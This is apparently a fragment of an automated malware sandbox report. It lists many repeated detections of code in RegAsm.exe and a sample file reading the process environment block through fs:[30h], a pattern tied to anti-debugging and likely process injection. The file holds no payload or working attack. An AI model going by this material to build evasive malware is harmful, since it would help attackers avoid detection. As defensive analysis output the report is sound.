          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_030590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_0304F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_0304F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_030AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_030AB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_030140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_030158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_030E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_0304A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_0303F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe - Code function: 2_2_030AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03014F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03014F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0304E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0302EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0302FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03028794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03097794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03097794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03097794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0301C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0301C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0301C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03048E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0304A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0304A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0301E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030CFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03027E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03027E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03027E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03027E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03027E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03027E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030DAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030DAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0302766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0303AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0303AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0303AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0303AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0303AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030AFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03058EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030CFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0301AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030DE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03023D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03023D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03023D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03023D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03023D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03023D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03023D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03023D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03023D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03023D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03023D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03023D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03023D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0309A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03044D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03044D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03044D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03053D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03093540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030C3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03037D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0303C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0303C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03042581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03042581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03042581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03042581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03012D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03012D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03012D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03012D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03012D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0304FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0304FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03041DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03041DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03041DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03096DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03096DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03096DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03096DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03096DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03096DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0302D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0302D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030C8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03096C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03096C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03096C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03096C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0304BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0304A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0303746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0302849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030E8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_030D14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03096CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03096CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_03096CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NQQWym075C.exeCode function: 4_2_05FD01CB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NQQWym075C.exeCode function: 4_2_05FD00AD mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NQQWym075C.exeCode function: 4_2_05FD00AD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F22AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F22ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F0AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F0AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F2FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F2D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F2D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F3927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FAB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FAB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FC8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02FBEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02EF9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F84257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F34A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F34A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02F13A1C mov eax, dword ptr fs:[00000030h]
